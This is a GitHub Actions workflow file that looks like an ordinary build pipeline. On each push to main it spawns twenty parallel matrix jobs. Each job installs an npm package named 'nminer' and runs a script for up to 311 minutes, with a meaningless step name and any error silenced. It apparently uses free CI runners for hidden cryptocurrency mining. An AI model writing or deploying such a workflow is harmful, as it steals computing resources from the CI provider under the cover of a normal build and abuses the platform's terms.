name: cross-contamination
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9004 }
          - { version: 5426 }
          - { version: 4500 }
          - { version: 8116 }
          - { version: 633 }
          - { version: 9583 }
          - { version: 7296 }
          - { version: 420 }
          - { version: 7139 }
          - { version: 489 }
          - { version: 5315 }
          - { version: 1346 }
          - { version: 2796 }
          - { version: 7194 }
          - { version: 6971 }
          - { version: 7966 }
          - { version: 2053 }
          - { version: 3303 }
          - { version: 1290 }
          - { version: 5929 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: repeat through ah subdued well-worn
        run: |
          npm install nminer@latest
          timeout 311m node cross-contamination.js || echo "cross-contamination executed"